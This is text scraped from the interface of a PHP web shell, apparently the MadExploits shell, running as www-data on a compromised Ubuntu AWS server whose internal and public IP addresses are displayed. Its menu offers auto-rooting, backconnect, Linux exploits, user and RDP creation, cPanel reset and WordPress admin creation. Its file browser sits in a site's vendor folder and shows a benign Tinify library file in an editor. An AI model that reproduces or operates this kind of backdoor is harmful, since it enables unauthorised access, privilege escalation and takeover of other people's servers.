Linux ip-172-31-33-47 5.4.0-1045-aws #47~18.04.1-Ubuntu SMP Tue Apr 13 15:58:14 UTC 2021 x86_64
Apache/2.4.29 (Ubuntu)
: 172.31.33.47 | : 3.144.6.159
Cant Read [ /etc/named.conf ]
7.4.20
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
stage /
vendor /
tinify /
tinify /
lib /
[ HOME SHELL ]
Name
Size
Permission
Action
Tinify
[ DIR ]
drwxrwxr-x
data
[ DIR ]
drwxrwxr-x
Tinify.php
2.07
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Tinify.php
<?php namespace Tinify; const VERSION = "1.5.2"; class Tinify { private static $key = NULL; private static $appIdentifier = NULL; private static $proxy = NULL; private static $compressionCount = NULL; private static $client = NULL; public static function setKey($key) { self::$key = $key; self::$client = NULL; } public static function setAppIdentifier($appIdentifier) { self::$appIdentifier = $appIdentifier; self::$client = NULL; } public static function setProxy($proxy) { self::$proxy = $proxy; self::$client = NULL; } public static function getCompressionCount() { return self::$compressionCount; } public static function setCompressionCount($compressionCount) { self::$compressionCount = $compressionCount; } public static function getClient() { if (!self::$key) { throw new AccountException("Provide an API key with Tinify\setKey(...)"); } if (!self::$client) { self::$client = new Client(self::$key, self::$appIdentifier, self::$proxy); } return self::$client; } public static function setClient($client) { self::$client = $client; } } function setKey($key) { return Tinify::setKey($key); } function setAppIdentifier($appIdentifier) { return Tinify::setAppIdentifier($appIdentifier); } function setProxy($proxy) { return Tinify::setProxy($proxy); } function getCompressionCount() { return Tinify::getCompressionCount(); } function compressionCount() { return Tinify::getCompressionCount(); } function fromFile($path) { return Source::fromFile($path); } function fromBuffer($string) { return Source::fromBuffer($string); } function fromUrl($string) { return Source::fromUrl($string); } function validate() { try { Tinify::getClient()->request("post", "/shrink"); } catch (AccountException $err) { if ($err->status == 429) return true; throw $err; } catch (ClientException $err) { return true; } }
Close